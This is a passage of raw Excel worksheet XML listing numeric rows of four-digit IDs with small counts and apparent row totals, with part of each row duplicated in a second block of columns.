        <v>4</v>
      </c>
      <c r="Q1267" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1268" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1268" s="7">
        <v>5103</v>
      </c>
      <c r="B1268" s="8">
        <v>22</v>
      </c>
      <c r="C1268" s="8">
        <v>0</v>
      </c>
      <c r="D1268" s="8">
        <v>2</v>
      </c>
      <c r="E1268" s="8">
        <v>1</v>
      </c>
      <c r="F1268" s="8">
        <v>4</v>
      </c>
      <c r="G1268" s="8">
        <v>3</v>
      </c>
      <c r="H1268" s="8">
        <v>32</v>
      </c>
      <c r="K1268" s="7">
        <v>5103</v>
      </c>
      <c r="L1268" s="8">
        <v>22</v>
      </c>
      <c r="M1268" s="8">
        <v>0</v>
      </c>
      <c r="N1268" s="8">
        <v>2</v>
      </c>
      <c r="O1268" s="8">
        <v>1</v>
      </c>
      <c r="P1268" s="8">
        <v>4</v>
      </c>
      <c r="Q1268" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1269" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1269" s="7">
        <v>5105</v>
      </c>
      <c r="B1269" s="8">
        <v>25</v>
      </c>
      <c r="C1269" s="8">
        <v>1</v>
      </c>
      <c r="D1269" s="8">
        <v>1</v>
      </c>
      <c r="E1269" s="8">
        <v>4</v>
      </c>
      <c r="F1269" s="8">
        <v>1</v>
      </c>
      <c r="G1269" s="8">
        <v>1</v>
      </c>
      <c r="H1269" s="8">
        <v>33</v>
      </c>
      <c r="K1269" s="7">
        <v>5105</v>
      </c>
      <c r="L1269" s="8">
        <v>25</v>
      </c>
      <c r="M1269" s="8">
        <v>1</v>
      </c>
      <c r="N1269" s="8">
        <v>1</v>
      </c>
      <c r="O1269" s="8">
        <v>4</v>
      </c>
      <c r="P1269" s="8">
        <v>1</v>
      </c>
      <c r="Q1269" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1270" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1270" s="7">
        <v>5106</v>
      </c>
      <c r="B1270" s="8">
        <v>24</v>
      </c>
      <c r="C1270" s="8">
        <v>1</v>
      </c>
      <c r="D1270" s="8">
        <v>0</v>
      </c>
      <c r="E1270" s="8">
        <v>0</v>
      </c>
      <c r="F1270" s="8">
        <v>13</v>
      </c>
      <c r="G1270" s="8">
        <v>31</v>
      </c>
      <c r="H1270" s="8">
        <v>69</v>
      </c>
      <c r="K1270" s="7">
        <v>5106</v>
      </c>
      <c r="L1270" s="8">
        <v>24</v>
      </c>
      <c r="M1270" s="8">
        <v>1</v>
      </c>
      <c r="N1270" s="8">
        <v>0</v>
      </c>
      <c r="O1270" s="8">
        <v>0</v>
      </c>
      <c r="P1270" s="8">
        <v>13</v>
      </c>
      <c r="Q1270" s="8">
        <v>31</v>
      </c>
    </row>
    <row r="1271" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1271" s="7">
        <v>5108</v>
      </c>
      <c r="B1271" s="8">
        <v>24</v>
      </c>
      <c r="C1271" s="8">
        <v>0</v>
      </c>
      <c r="D1271" s="8">
        <v>0</v>
      </c>
      <c r="E1271" s="8">
        <v>0</v>
      </c>
      <c r="F1271" s="8">
        <v>15</v>
      </c>
      <c r="G1271" s="8">
        <v>6</v>
      </c>
      <c r="H1271" s="8">
        <v>45</v>
      </c>
      <c r="K1271" s="7">
        <v>5108</v>
      </c>
      <c r="L1271" s="8">
        <v>24</v>
      </c>
      <c r="M1271" s="8">
        <v>0</v>
      </c>
      <c r="N1271" s="8">
        <v>0</v>
      </c>
      <c r="O1271" s="8">
        <v>0</v>
      </c>
      <c r="P1271" s="8">
        <v>15</v>
      </c>
      <c r="Q1271" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1272" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1272" s="7">
        <v>5112</v>
      </c>
      <c r="B1272" s="8">
        <v>28</v>
      </c>
      <c r="C1272" s="8">
        <v>1</v>
      </c>
      <c r="D1272" s="8">
        <v>0</v>
      </c>
      <c r="E1272" s="8">
        <v>0</v>
      </c>
      <c r="F1272" s="8">
        <v>0</v>
      </c>
      <c r="G1272" s="8">
        <v>3</v>
      </c>
      <c r="H1272" s="8">
        <v>32</v>
      </c>
      <c r="K1272" s="7">
        <v>5112</v>
      </c>
      <c r="L1272" s="8">
        <v>28</v>
      </c>
      <c r="M1272" s="8">
        <v>1</v>
      </c>
      <c r="N1272" s="8">
        <v>0</v>
      </c>
      <c r="O1272" s="8">
        <v>0</v>
      </c>
      <c r="P1272" s="8">
        <v>0</v>
      </c>
      <c r="Q1272" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1273" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1273" s="7">
        <v>5113</v>
      </c>
      <c r="B1273" s="8">
        <v>25</v>
      </c>
      <c r="C1273" s="8">
        <v>1</v>
      </c>
      <c r="D1273" s="8">
        <v>0</v>
      </c>
      <c r="E1273" s="8">
        <v>6</v>
      </c>
      <c r="F1273" s="8">
        <v>1</v>
      </c>
      <c r="G1273" s="8">
        <v>0</v>
      </c>
      <c r="H1273" s="8">
        <v>33</v>
      </c>
      <c r="K1273" s="7">
        <v>5113</v>
      </c>
      <c r="L1273" s="8">
        <v>25</v>
      </c>
      <c r="M1273" s="8">
        <v>1</v>
      </c>
      <c r="N1273" s="8">
        <v>0</v>
      </c>
      <c r="O1273" s="8">
        <v>6</v>
      </c>
      <c r="P1273" s="8">
        <v>1</v>
      </c>
      <c r="Q1273" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1274" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1274" s="7">
        <v>5114</v>
      </c>
      <c r="B1274" s="8">
        <v>25</v>
      </c>
      <c r="C1274" s="8">
        <v>1</v>
      </c>
      <c r="D1274" s="8">
        <v>0</v>
      </c>
      <c r="E1274" s="8">
        <v>4</v>
      </c>
      <c r="F1274" s="8">
        <v>2</v>
      </c>
      <c r="G1274" s="8">
        <v>2</v>
      </c>
      <c r="H1274" s="8">
        <v>34</v>
      </c>
      <c r="K1274" s="7">
        <v>5114</v>
      </c>
      <c r="L1274" s="8">
        <v>25</v>
      </c>
      <c r="M1274" s="8">
        <v>1</v>
      </c>
      <c r="N1274" s="8">
        <v>0</v>
      </c>
      <c r="O1274" s="8">
        <v>4</v>
      </c>
      <c r="P1274" s="8">
        <v>2</v>
      </c>
      <c r="Q1274" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1275" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1275" s="7">
        <v>5115</v>
      </c>
      <c r="B1275" s="8">
        <v>26</v>
      </c>
      <c r="C1275" s="8">
        <v>0</v>
      </c>
      <c r="D1275" s="8">
        <v>1</v>
      </c>
      <c r="E1275" s="8">
        <v>1</v>
      </c>
      <c r="F1275" s="8">
        <v>2</v>
      </c>
      <c r="G1275" s="8">
        <v>2</v>
      </c>
      <c r="H1275" s="8">
        <v>32</v>
      </c>
      <c r="K1275" s="7">
        <v>5115</v>
      </c>
      <c r="L1275" s="8">
        <v>26</v>
      </c>
      <c r="M1275" s="8">
        <v>0</v>
      </c>
      <c r="N1275" s="8">
        <v>1</v>
      </c>
      <c r="O1275" s="8">
        <v>1</v>
      </c>
      <c r="P1275" s="8">
        <v>2</v>
      </c>
      <c r="Q1275" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1276" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1276" s="7">
        <v>5116</v>
      </c>
      <c r="B1276" s="8">
        <v>26</v>
      </c>
      <c r="C1276" s="8">
        <v>3</v>
      </c>
      <c r="D1276" s="8">
        <v>10</v>
      </c>
      <c r="E1276" s="8">
        <v>4</v>
      </c>
      <c r="F1276" s="8">
        <v>4</v>
      </c>
      <c r="G1276" s="8">
        <v>3</v>
      </c>
      <c r="H1276" s="8">
        <v>50</v>
      </c>
      <c r="K1276" s="7">
        <v>5116</v>
      </c>
      <c r="L1276" s="8">
        <v>26</v>
      </c>
      <c r="M1276" s="8">
        <v>3</v>
      </c>
      <c r="N1276" s="8">
        <v>10</v>
      </c>
      <c r="O1276" s="8">
        <v>4</v>
      </c>
      <c r="P1276" s="8">
        <v>4</v>
      </c>
      <c r="Q1276" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1277" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1277" s="7">
        <v>5117</v>
      </c>
      <c r="B1277" s="8">
        <v>25</v>
      </c>
      <c r="C1277" s="8">
        <v>0</v>
      </c>
      <c r="D1277" s="8">
        <v>0</v>
      </c>
      <c r="E1277" s="8">
        <v>0</v>
      </c>
      <c r="F1277" s="8">
        <v>4</v>
      </c>
      <c r="G1277" s="8">
        <v>1</v>
      </c>
      <c r="H1277" s="8">
        <v>30</v>
      </c>
      <c r="K1277" s="7">
        <v>5117</v>
      </c>
      <c r="L1277" s="8">
        <v>25</v>
      </c>
      <c r="M1277" s="8">
        <v>0</v>
      </c>
      <c r="N1277" s="8">
        <v>0</v>
      </c>
      <c r="O1277" s="8">
        <v>0</v>
      </c>
      <c r="P1277" s="8">
        <v>4</v>
      </c>
      <c r="Q1277" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1278" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1278" s="7">
        <v>5118</v>
      </c>
      <c r="B1278" s="8">
        <v>6</v>
      </c>
      <c r="C1278" s="8">
        <v>0</v>
      </c>
      <c r="D1278" s="8">
        <v>8</v>
      </c>
      <c r="E1278" s="8">
        <v>2</v>
      </c>
      <c r="F1278" s="8">
        <v>8</v>
      </c>
      <c r="G1278" s="8">
        <v>4</v>
      </c>
      <c r="H1278" s="8">
        <v>28</v>
      </c>
      <c r="K1278" s="7">
        <v>5118</v>
      </c>
      <c r="L1278" s="8">
        <v>6</v>
      </c>
      <c r="M1278" s="8">
        <v>0</v>
      </c>
      <c r="N1278" s="8">
        <v>8</v>
      </c>
      <c r="O1278" s="8">
        <v>2</v>
      </c>
      <c r="P1278" s="8">
        <v>8</v>
      </c>
      <c r="Q1278" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1279" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1279" s="7">
        <v>5119</v>
      </c>
      <c r="B1279" s="8">
        <v>6</v>
      </c>
      <c r="C1279" s="8">
        <v>1</v>
      </c>
      <c r="D1279" s="8">
        <v>8</v>
      </c>
      <c r="E1279" s="8">
        <v>3</v>
      </c>
      <c r="F1279" s="8">
        <v>5</v>
      </c>
      <c r="G1279" s="8">
        <v>1</v>
      </c>
      <c r="H1279" s="8">
        <v>24</v>
      </c>
      <c r="K1279" s="7">
        <v>5119</v>
      </c>
      <c r="L1279" s="8">
        <v>6</v>
      </c>
      <c r="M1279" s="8">
        <v>1</v>
      </c>
      <c r="N1279" s="8">
        <v>8</v>
      </c>
      <c r="O1279" s="8">
        <v>3</v>
      </c>
      <c r="P1279" s="8">
        <v>5</v>
      </c>
      <c r="Q1279" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1280" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1280" s="7">
        <v>5120</v>
      </c>
      <c r="B1280" s="8">
        <v>6</v>
      </c>
      <c r="C1280" s="8">
        <v>1</v>
      </c>
      <c r="D1280" s="8">
        <v>25</v>
      </c>
      <c r="E1280" s="8">
        <v>28</v>
      </c>
      <c r="F1280" s="8">
        <v>8</v>
      </c>
      <c r="G1280" s="8">
        <v>4</v>
      </c>
      <c r="H1280" s="8">
        <v>72</v>
      </c>
      <c r="K1280" s="7">
        <v>5120</v>
      </c>
      <c r="L1280" s="8">
        <v>6</v>
      </c>
      <c r="M1280" s="8">
        <v>1</v>
      </c>
      <c r="N1280" s="8">
        <v>25</v>
      </c>
      <c r="O1280" s="8">
        <v>28</v>
      </c>
      <c r="P1280" s="8">
        <v>8</v>
      </c>
      <c r="Q1280" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1281" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1281" s="7">
        <v>5121</v>
      </c>
      <c r="B1281" s="8">
        <v>25</v>
      </c>
      <c r="C1281" s="8">
        <v>0</v>
      </c>
      <c r="D1281" s="8">
        <v>3</v>
      </c>
      <c r="E1281" s="8">
        <v>5</v>
      </c>
      <c r="F1281" s="8">
        <v>2</v>
      </c>
      <c r="G1281" s="8">
        <v>0</v>
      </c>
      <c r="H1281" s="8">
        <v>35</v>
      </c>
      <c r="K1281" s="7">
        <v>5121</v>
      </c>
      <c r="L1281" s="8">
        <v>25</v>
      </c>
      <c r="M1281" s="8">
        <v>0</v>
      </c>
      <c r="N1281" s="8">
        <v>3</v>
      </c>
      <c r="O1281" s="8">
        <v>5</v>
      </c>
      <c r="P1281" s="8">
        <v>2</v>
      </c>
      <c r="Q1281" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1282" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1282" s="7">
        <v>5123</v>
      </c>
      <c r="B1282" s="8">
        <v>22</v>
      </c>
      <c r="C1282" s="8">
        <v>0</v>
      </c>
      <c r="D1282" s="8">
        <v>14</v>
      </c>
      <c r="E1282" s="8">
        <v>12</v>
      </c>
      <c r="F1282" s="8">
        <v>5</v>
      </c>
      <c r="G1282" s="8">
        <v>3</v>
      </c>
      <c r="H1282" s="8">
        <v>56</v>
      </c>
      <c r="K1282" s="7">
        <v>5123</v>
      </c>
      <c r="L1282" s="8">
        <v>22</v>
      </c>
      <c r="M1282" s="8">
        <v>0</v>
      </c>
      <c r="N1282" s="8">
        <v>14</v>
      </c>
      <c r="O1282" s="8">
        <v>12</v>
      </c>
      <c r="P1282" s="8">
        <v>5</v>
      </c>
      <c r="Q1282" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1283" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1283" s="7">
        <v>5124</v>
      </c>
      <c r="B1283" s="8">
        <v>20</v>
      </c>
      <c r="C1283" s="8">
        <v>1</v>
      </c>
      <c r="D1283" s="8">
        <v>0</v>
      </c>
      <c r="E1283" s="8">
        <v>0</v>
      </c>
      <c r="F1283" s="8">
        <v>4</v>
      </c>
      <c r="G1283" s="8">
        <v>1</v>
      </c>
      <c r="H1283" s="8">
        <v>26</v>
      </c>
      <c r="K1283" s="7">
        <v>5124</v>
      </c>
      <c r="L1283" s="8">
        <v>20</v>
      </c>
      <c r="M1283" s="8">
        <v>1</v>
      </c>
      <c r="N1283" s="8">
        <v>0</v>
      </c>
      <c r="O1283" s="8">
        <v>0</v>
      </c>
      <c r="P1283" s="8">
        <v>4</v>
      </c>
      <c r="Q1283" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1284" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1284" s="7">
        <v>5125</v>
      </c>
      <c r="B1284" s="8">
        <v>20</v>
      </c>
      <c r="C1284" s="8">
        <v>0</v>
      </c>
      <c r="D1284" s="8">
        <v>0</v>
      </c>
      <c r="E1284" s="8">
        <v>0</v>
      </c>
      <c r="F1284" s="8">
        <v>1</v>
      </c>
      <c r="G1284" s="8">
        <v>3</v>
      </c>
      <c r="H1284" s="8">
        <v>24</v>
      </c>
      <c r="K1284" s="7">
        <v>5125</v>
      </c>
      <c r="L1284" s="8">
        <v>20</v>
      </c>
      <c r="M1284" s="8">
        <v>0</v>
      </c>
      <c r="N1284" s="8">
        <v>0</v>
      </c>
      <c r="O1284" s="8">
        <v>0</v>
      </c>
      <c r="P1284" s="8">
        <v>1</v>
      </c>
      <c r="Q1284" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1285" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1285" s="7">
        <v>5126</v>
      </c>
      <c r="B1285" s="8">
        <v>24</v>
      </c>
      <c r="C1285" s="8">
        <v>1</v>
      </c>
      <c r="D1285" s="8">
        <v>10</v>
      </c>
      <c r="E1285" s="8">
        <v>0</v>
      </c>
      <c r="F1285" s="8">
        <v>5</v>
      </c>
      <c r="G1285" s="8">
        <v>2</v>
      </c>
      <c r="H1285" s="8">
        <v>42</v>
      </c>
      <c r="K1285" s="7">
        <v>5126</v>
      </c>
      <c r="L1285" s="8">
        <v>24</v>
      </c>
      <c r="M1285" s="8">
        <v>1</v>
      </c>
      <c r="N1285" s="8">
        <v>10</v>
      </c>
      <c r="O1285" s="8">
        <v>0</v>
      </c>
      <c r="P1285" s="8">
        <v>5</v>
      </c>
      <c r="Q1285" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1286" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1286" s="7">
        <v>5131</v>
      </c>
      <c r="B1286" s="8">
        <v>26</v>
      </c>
      <c r="C1286" s="8">
        <v>0</v>
      </c>
      <c r="D1286" s="8">
        <v>0</v>
      </c>
      <c r="E1286" s="8">
        <v>0</v>
      </c>
      <c r="F1286" s="8">
        <v>47</v>
      </c>
      <c r="G1286" s="8">
        <v>6</v>
      </c>
      <c r="H1286" s="8">
        <v>79</v>
      </c>
      <c r="K1286" s="7">
        <v>5131</v>
      </c>
      <c r="L1286" s="8">
        <v>26</v>
      </c>
      <c r="M1286" s="8">
        <v>0</v>
      </c>
      <c r="N1286" s="8">
        <v>0</v>
      </c>
      <c r="O1286" s="8">
        <v>0</v>
      </c>
      <c r="P1286" s="8">
        <v>47</v>
      </c>
      <c r="Q1286" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1287" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1287" s="7">
        <v>5133</v>
      </c>
      <c r="B1287" s="8">
        <v>26</v>
      </c>
      <c r="C1287" s="8">
        <v>0</v>
      </c>
      <c r="D1287" s="8">
        <v>0</v>
      </c>
      <c r="E1287" s="8">
        <v>0</v>
      </c>
      <c r="F1287" s="8">
        <v>1</v>
      </c>
      <c r="G1287" s="8">
        <v>2</v>
      </c>
      <c r="H1287" s="8">
        <v>29</v>
      </c>
      <c r="K1287" s="7">
        <v>5133</v>
      </c>
      <c r="L1287" s="8">
        <v>26</v>
      </c>
      <c r="M1287" s="8">
        <v>0</v>
      </c>
      <c r="N1287" s="8">
        <v>0</v>
      </c>
      <c r="O1287" s="8">
        <v>0</v>
      </c>
      <c r="P1287" s="8">
        <v>1</v>
      </c>
      <c r="Q1287" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1288" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1288" s="7">
        <v>5136</v>
      </c>
      <c r="B1288" s="8">
        <v>6</v>
      </c>
      <c r="C1288" s="8">
        <v>1</v>
      </c>
      <c r="D1288" s="8">
        <v>1</v>
      </c>
      <c r="E1288" s="8">
        <v>2</v>
      </c>
      <c r="F1288" s="8">
        <v>3</v>
      </c>
      <c r="G1288" s="8">
        <v>7</v>
      </c>
      <c r="H1288" s="8">
        <v>20</v>
      </c>
      <c r="K1288" s="7">
        <v>5136</v>
      </c>
      <c r="L1288" s="8">
        <v>6</v>
      </c>
      <c r="M1288" s="8">
        <v>1</v>
      </c>
      <c r="N1288" s="8">
        <v>1</v>
      </c>
      <c r="O1288" s="8">
        <v>2</v>
      </c>
      <c r="P1288" s="8">
        <v>3</v>
      </c>
      <c r="Q1288" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="1289" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1289" s="7">
        <v>5137</v>
      </c>
      <c r="B1289" s="8">
        <v>20</v>
      </c>
      <c r="C1289" s="8">
        <v>2</v>
      </c>
      <c r="D1289" s="8">
        <v>36</v>
      </c>
      <c r="E1289" s="8">
        <v>63</v>
      </c>
      <c r="F1289" s="8">
        <v>7</v>
      </c>
      <c r="G1289" s="8">
        <v>3</v>
      </c>
      <c r="H1289" s="8">
        <v>131</v>
      </c>
      <c r="K1289" s="7">
        <v>5137</v>
      </c>
      <c r="L1289" s="8">
        <v>20</v>
      </c>
      <c r="M1289" s="8">
        <v>2</v>
      </c>
      <c r="N1289" s="8">
        <v>36</v>
      </c>
      <c r="O1289" s="8">
        <v>63</v>
      </c>
      <c r="P1289" s="8">
        <v>7</v>
      </c>
      <c r="Q1289" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1290" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1290" s="7">
        <v>5140</v>
      </c>
      <c r="B1290" s="8">
        <v>26</v>
      </c>
      <c r="C1290" s="8">
        <v>0</v>
      </c>
      <c r="D1290" s="8">
        <v>0</v>
      </c>
      <c r="E1290" s="8">
        <v>0</v>
      </c>
      <c r="F1290" s="8">
        <v>7</v>
      </c>
      <c r="G1290" s="8">
        <v>2</v>
      </c>
      <c r="H1290" s="8">
        <v>35</v>
      </c>
      <c r="K1290" s="7">
        <v>5140</v>
      </c>
      <c r="L1290" s="8">
        <v>26</v>
      </c>
      <c r="M1290" s="8">
        <v>0</v>
      </c>
      <c r="N1290" s="8">
        <v>0</v>
      </c>
      <c r="O1290" s="8">
        <v>0</v>
      </c>
      <c r="P1290" s="8">
        <v>7</v>
      </c>
      <c r="Q1290" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1291" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1291" s="7">
        <v>5145</v>
      </c>
      <c r="B1291" s="8">
        <v>1</v>
      </c>
      <c r="C1291" s="8">
        <v>1</v>
      </c>
      <c r="D1291" s="8">
        <v>15</v>
      </c>
      <c r="E1291" s="8">
        <v>15</v>
      </c>
      <c r="F1291" s="8">
        <v>4</v>
      </c>
      <c r="G1291" s="8">
        <v>0</v>
      </c>
      <c r="H1291" s="8">
        <v>36</v>
      </c>
      <c r="K1291" s="7">
        <v>5145</v>
      </c>
      <c r="L1291" s="8">
        <v>1</v>
      </c>
      <c r="M1291" s="8">
        <v>1</v>
      </c>
      <c r="N1291" s="8">
        <v>15</v>
      </c>
      <c r="O1291" s="8">
        <v>15</v>
      </c>
      <c r="P1291" s="8">
        <v>4</v>
      </c>
      <c r="Q1291" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1292" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1292" s="7">
        <v>5154</v>
      </c>
      <c r="B1292" s="8">
        <v>25</v>
      </c>
      <c r="C1292" s="8">
        <v>1</v>
      </c>
      <c r="D1292" s="8">
        <v>0</v>
      </c>
      <c r="E1292" s="8">
        <v>0</v>
      </c>
      <c r="F1292" s="8">
        <v>5</v>
      </c>
      <c r="G1292" s="8">
        <v>2</v>
      </c>
      <c r="H1292" s="8">
        <v>33</v>
      </c>
      <c r="K1292" s="7">
        <v>5154</v>
      </c>
      <c r="L1292" s="8">
        <v>25</v>
      </c>
      <c r="M1292" s="8">
        <v>1</v>
      </c>
      <c r="N1292" s="8">
        <v>0</v>
      </c>
      <c r="O1292" s="8">
        <v>0</v>
      </c>
      <c r="P1292" s="8">
        <v>5</v>
      </c>
      <c r="Q1292" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1293" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1293" s="7">
        <v>5155</v>
      </c>
      <c r="B1293" s="8">
        <v>26</v>
      </c>
      <c r="C1293" s="8">
        <v>1</v>
      </c>
      <c r="D1293" s="8">
        <v>4</v>
      </c>
      <c r="E1293" s="8">
        <v>8</v>
      </c>
      <c r="F1293" s="8">
        <v>1</v>
      </c>
      <c r="G1293" s="8">
        <v>1</v>
      </c>
      <c r="H1293" s="8">
        <v>41</v>
      </c>
      <c r="K1293" s="7">
        <v>5155</v>
      </c>
      <c r="L1293" s="8">
        <v>26</v>
      </c>
      <c r="M1293" s="8">
        <v>1</v>
      </c>
      <c r="N1293" s="8">
        <v>4</v>
      </c>
      <c r="O1293" s="8">
        <v>8</v>
      </c>
      <c r="P1293" s="8">
        <v>1</v>
      </c>
      <c r="Q1293" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1294" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1294" s="7">
        <v>5159</v>
      </c>
      <c r="B1294" s="8">
        <v>20</v>
      </c>
      <c r="C1294" s="8">
        <v>1</v>
      </c>
      <c r="D1294" s="8">
        <v>1</v>
      </c>
      <c r="E1294" s="8">
        <v>0</v>
      </c>
      <c r="F1294" s="8">
        <v>1</v>
      </c>
      <c r="G1294" s="8">
        <v>1</v>
      </c>
      <c r="H1294" s="8">
        <v>24</v>
      </c>
      <c r="K1294" s="7">
        <v>5159</v>
      </c>
      <c r="L1294" s="8">
        <v>20</v>
      </c>
      <c r="M1294" s="8">
        <v>1</v>
      </c>
      <c r="N1294" s="8">
        <v>1</v>
      </c>
      <c r="O1294" s="8">
        <v>0</v>
      </c>
      <c r="P1294" s="8">
        <v>1</v>
      </c>
      <c r="Q1294" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1295" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1295" s="7">
        <v>5160</v>
      </c>
      <c r="B1295" s="8">
        <v>7</v>
      </c>
      <c r="C1295" s="8">
        <v>2</v>
      </c>
      <c r="D1295" s="8">
        <v>80</v>
      </c>
      <c r="E1295" s="8">
        <v>100</v>
      </c>
      <c r="F1295" s="8">
        <v>6</v>
      </c>
      <c r="G1295" s="8">
        <v>8</v>
      </c>
      <c r="H1295" s="8">
        <v>203</v>
      </c>
      <c r="K1295" s="7">
        <v>5160</v>
      </c>
      <c r="L1295" s="8">
        <v>7</v>
      </c>
      <c r="M1295" s="8">
        <v>2</v>
      </c>
      <c r="N1295" s="8">
        <v>80</v>
      </c>
      <c r="O1295" s="8">
        <v>100</v>
      </c>
      <c r="P1295" s="8">
        <v>6</v>
      </c>
      <c r="Q1295" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="1296" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1296" s="7">
        <v>5161</v>
      </c>
      <c r="B1296" s="8">
        <v>25</v>
      </c>
      <c r="C1296" s="8">
        <v>1</v>
      </c>
      <c r="D1296" s="8">
        <v>0</v>
      </c>
      <c r="E1296" s="8">
        <v>7</v>
      </c>
      <c r="F1296" s="8">
        <v>4</v>
      </c>
      <c r="G1296" s="8">
        <v>5</v>
      </c>
      <c r="H1296" s="8">
        <v>42</v>
      </c>
      <c r="K1296" s="7">
        <v>5161</v>
      </c>
      <c r="L1296" s="8">
        <v>25</v>
      </c>
      <c r="M1296" s="8">
        <v>1</v>
      </c>
      <c r="N1296" s="8">
        <v>0</v>
      </c>
      <c r="O1296" s="8">
        <v>7</v>
      </c>
      <c r="P1296" s="8">
        <v>4</v>
      </c>
      <c r="Q1296" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1297" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1297" s="7">
        <v>5166</v>
      </c>
      <c r="B1297" s="8">
        <v>0</v>
      </c>
      <c r="C1297" s="8">
        <v>0</v>
      </c>
      <c r="D1297" s="8">
        <v>10</v>
      </c>
      <c r="E1297" s="8">
        <v>10</v>
      </c>
      <c r="F1297" s="8">
        <v>2</v>
      </c>
      <c r="G1297" s="8">
        <v>2</v>
      </c>
      <c r="H1297" s="8">
        <v>24</v>
      </c>
      <c r="K1297" s="7">
        <v>5166</v>
      </c>
      <c r="L1297" s="8">
        <v>0</v>
      </c>
      <c r="M1297" s="8">
        <v>0</v>
      </c>
      <c r="N1297" s="8">
        <v>10</v>
      </c>
      <c r="O1297" s="8">
        <v>10</v>
      </c>
      <c r="P1297" s="8">
        <v>2</v>
      </c>
      <c r="Q1297" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1298" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1298" s="7">
        <v>5168</v>
      </c>
      <c r="B1298" s="8">
        <v>5</v>
      </c>
      <c r="C1298" s="8">
        <v>0</v>
      </c>
      <c r="D1298" s="8">
        <v>8</v>
      </c>
      <c r="E1298" s="8">
        <v>0</v>
      </c>
      <c r="F1298" s="8">
        <v>1</v>
      </c>
      <c r="G1298" s="8">
        <v>2</v>
      </c>
      <c r="H1298" s="8">
        <v>16</v>
      </c>
      <c r="K1298" s="7">
        <v>5168</v>
      </c>
      <c r="L1298" s="8">
        <v>5</v>
      </c>
      <c r="M1298" s="8">
        <v>0</v>
      </c>
      <c r="N1298" s="8">
        <v>8</v>
      </c>
      <c r="O1298" s="8">
        <v>0</v>
      </c>
      <c r="P1298" s="8">
        <v>1</v>
      </c>
      <c r="Q1298" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1299" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1299" s="7">
        <v>5171</v>
      </c>
      <c r="B1299" s="8">
        <v>24</v>
      </c>
      <c r="C1299" s="8">
        <v>1</v>
      </c>
      <c r="D1299" s="8">
        <v>0</v>
      </c>
      <c r="E1299" s="8">
        <v>0</v>
      </c>
      <c r="F1299" s="8">
        <v>2</v>
      </c>
      <c r="G1299" s="8">
        <v>3</v>
      </c>
      <c r="H1299" s="8">
        <v>30</v>
      </c>
      <c r="K1299" s="7">
        <v>5171</v>
      </c>
      <c r="L1299" s="8">
        <v>24</v>
      </c>
      <c r="M1299" s="8">
        <v>1</v>
      </c>
      <c r="N1299" s="8">
        <v>0</v>
      </c>
      <c r="O1299" s="8">
        <v>0</v>
      </c>
      <c r="P1299" s="8">
        <v>2</v>
      </c>
      <c r="Q1299" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1300" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1300" s="7">
        <v>5172</v>
      </c>
      <c r="B1300" s="8">
        <v>7</v>
      </c>
      <c r="C1300" s="8">
        <v>0</v>
      </c>
      <c r="D1300" s="8">
        <v>1</v>
      </c>
      <c r="E1300" s="8">
        <v>4</v>
      </c>
      <c r="F1300" s="8">
        <v>1</v>
      </c>
      <c r="G1300" s="8">
        <v>4</v>
      </c>
      <c r="H1300" s="8">
        <v>17</v>
      </c>
